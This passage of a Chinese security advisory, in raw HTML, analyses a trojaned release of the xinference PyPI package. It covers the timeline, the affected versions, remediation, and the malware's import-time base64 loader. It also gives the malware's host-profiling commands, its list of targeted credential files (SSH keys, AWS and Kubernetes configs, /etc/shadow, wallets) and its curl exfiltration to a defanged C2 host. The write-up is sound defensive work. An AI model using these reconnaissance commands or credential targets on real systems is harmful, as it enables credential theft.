&#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意负载会执行广泛的侦察并外泄大量敏感数据，包括</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">云凭据</span></strong><span leaf="">（包含针对 AWS 的 IMDSv2 逻辑）、</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">SSH 密钥</span></strong><span leaf="">、</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Kubernetes 配置</span></strong><span leaf="">、</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">.env 文件</span></strong><span leaf="">、</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">API 令牌</span></strong><span leaf="">、</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加密货币钱包</span></strong><span leaf="">等，并将数据发送至攻击者控制的 C2 服务器 (hxxps://whereisitat.lucyatemysuperbox.space/)。数据被压缩为 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">love.tar.gz</span></code><span leaf=""> 后通过 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">curl</span></code><span leaf=""> 命令发送。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该软件包总下载量约为 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">68 万次</span></strong><span leaf="">，其 GitHub 仓库 (xorbitsai/inference) 拥有 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">9.3K 颗星</span></strong><span leaf="">。仅上述三个恶意版本受到影响；在用户报告可疑行为（例如发现搜索密码的 grep 活动）后，维护者已将这些版本从 PyPI 撤回。目前 PyPI 上的最新安全版本为 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2.5.0</span></strong><span leaf="">（发布于 2026 年 4 月 12 日至 13 日左右）。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件中包含“# hacked by teampcp”标记，这与威胁组织 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">TeamPCP</span></strong><span leaf=""> 先前的攻击行为一致。然而，TeamPCP 于 2026 年 4 月 22 日在 X 平台上公开否认参与此事，暗示这可能是模仿者或“假旗”行动。这符合 TeamPCP 在 2026 年发起的更广泛供应链活动，其目标是通过凭据窃取负载攻击高价值的 PyPI/npm 软件包。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">针对受影响用户的紧急行动：</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">如果您安装或导入了 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">xinference==2.6.0, 2.6.1, 或 2.6.2</span></code><span leaf="">，</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">请将该主机/环境视为完全被攻破</span></strong><span leaf="">。请立即隔离该环境，轮换所有可从该环境访问的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">凭据</span></strong><span leaf="">，并审计后续的可疑活动。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Xinference 背景介绍</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">官方项目<span textstyle="" style="font-weight: normal;">：由 XorbitsAI 开发。GitHub 地址：<a href="https://github.com/xorbitsai/inference" target="_blank">https://github.com/xorbitsai/inference</a> (9.3K stars)。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">用途<span textstyle="" style="font-weight: normal;">：面向开源 LLM、嵌入模型、图像/音频模型的生产级推理服务器。提供兼容 OpenAI 的 API；支持在云端、本地或笔记本电脑上进行分布式部署。集成了 LangChain、LlamaIndex、Dify 等工具。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">PyPI 软件包<span textstyle="" style="font-weight: normal;">：xinference —— 作者/维护者：Qin Xuye (xprobe)。许可证：Apache 2.0。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">正版发布历史<span textstyle="" style="font-weight: normal;">：最新安全版本为 2.5.0（2026 年 4 月）。GitHub 上不存在 2.6.x 的标签或发布版本，表明这些恶意上传绕过了源码仓库。</span></span></strong></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">事件时间线</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2025 年 10 月起</span></strong><p><span leaf="">与维护者关联的机器人账号 XprobeBot 出现活动；随后被怀疑是未经授权上传 PyPI 包的切入点。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2026 年 4 月初</span></strong><p><span leaf="">发布正版 2.5.0 版本。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2026 年 4 月 22 日左右（具体上传时间未公开）</span></strong><p><span leaf="">恶意版本 2.6.0–2.6.2 通过被盗的 PyPI 凭据上传至 PyPI（GitHub 端无变动）。XprobeBot 在 UTC 时间约 04:08 提交了一次操作，将 base64 混淆的恶意负载添加到了 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">__init__.py</span></code><span leaf=""> 中。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2026 年 4 月 22 日（上午）</span></strong><p><span leaf="">用户报告可疑行为（例如 GitHub issue <a class="wx_topic_link" topic-id="moau2hnl-dkggaz" style="color: #576B95 !important;" data-topic="1" data-recommend="">#4828</a> 提到发现 grep 扫描密码的操作）。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2026 年 4 月 22 日</span></strong><p><span leaf="">维护者撤回了这三个版本。JFrog 安全研究团队发布了详细分析。TeamPCP 在 X 上发布声明否认，称其为模仿行为。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2026 年 4 月 22 日至 23 日</span></strong><p><span leaf="">OX Security 等机构发布独立确认报告。目前 PyPI 仅显示 ≤2.5.0 的版本可用。</span></p></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件技术分析</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该攻击是典型的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">供应链木马</span></strong><span leaf="">，在导入包时触发（无需单独执行）。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">感染向量</span></h3><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">恶意代码</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">仅</span></strong><span leaf="">被注入到 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">xinference/__init__.py</span></code><span leaf=""> 中。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">在 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">import xinference</span></code><span leaf=""> 时，会存在一个经过高度混淆的 base64 编码负载（第一阶段）。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">第一阶段会解码并派生一个</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">分离的子 Python 解释器进程</span></strong><span leaf="">（通过带有 stdin 的 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">subprocess.Popen</span></code><span leaf="">），运行第二阶段负载。这种方式可以将恶意软件从父进程中隐匿。</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">大量使用异常处理、抑制 stdout/stderr 以及清理临时文件以实现隐蔽性。</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">负载行为（第二阶段收集器）</span></h3><p><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">1.</span>主机画像：运行 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">hostname; pwd; whoami; uname -a; ip addr; ip route</span></code><span leaf=""> 等命令。</span></strong></p><p><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">2.</span><span textstyle="" style="font-weight: bold;">机密</span>信息收割（广泛的递归搜索，有限的搜索深度）：</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">SSH 密钥<span textstyle="" style="font-weight: normal;">（</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.ssh/id_rsa</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">/etc/ssh/ssh_host_*_key</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">云凭据：</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.aws/credentials</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.aws/config</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, GCP 配置, Kubernetes (</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.kube/config</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, service-account tokens)。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">AWS 特有行为：<span textstyle="" style="font-weight: normal;">获取 IMDSv2 令牌以及 IAM 角色凭据；尝试调用 Secrets Manager (ListSecrets) 和 SSM (DescribeParameters)。（注：由于存在小 bug，限制了完整机密值的提取）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">包管理器令牌：</span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.npmrc</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">~/.pypirc</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, Cargo 凭据。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">.env 文件<span textstyle="" style="font-weight: normal;">、</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.git-credentials</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">、</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.gitconfig</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">、Docker </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">config.json</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">数据库配置<span textstyle="" style="font-weight: normal;">（</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.pgpass</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, Redis, MongoDB, LDAP, Postfix）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加密货币钱包<span textstyle="" style="font-weight: normal;">（比特币、以太坊等）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Shell 历史记录<span textstyle="" style="font-weight: normal;">（</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.bash_history</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.zsh_history</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">）、</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">/etc/passwd</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">、</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">/etc/shadow</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">、TLS 密钥（</span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 